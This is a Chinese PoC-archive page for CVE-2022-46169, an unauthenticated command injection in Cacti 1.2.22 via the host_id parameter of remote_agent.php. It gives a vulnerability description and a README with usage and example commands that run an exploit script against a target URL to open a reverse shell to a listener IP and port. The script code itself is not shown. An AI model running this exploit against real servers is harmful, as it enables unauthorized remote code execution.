POC详情: ef9863ace252fab26c0985bc2d1b272c359e6f0b

来源
关联漏洞
标题: Cacti 命令注入漏洞 (CVE-2022-46169)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti v1.2.22版本存在命令注入漏洞,该漏洞源于未经身份验证的命令注入,允许未经身份验证的用户在运行Cacti的服务器上执行任意代码。
描述
PoC for CVE-2022-46169 that affects Cacti 1.2.22 version
介绍
# CVE-2022-46169 POC

This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.

## Description

The CVE-2022-46169 vulnerability allows an unauthenticated command injection in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.

## Usage

```bash
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
```

Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.

Example:

```bash
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
```

## Disclaimer

This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script.
References

[CVE-2022-46169 - CVE entry for the vulnerability.](https://nvd.nist.gov/vuln/detail/CVE-2022-46169) \
[Cacti Security Advisories in Github](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)
文件快照

[4.0K] /data/pocs/ef9863ace252fab26c0985bc2d1b272c359e6f0b ├── [2.2K] CVE-2022-46169.py └── [1.3K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。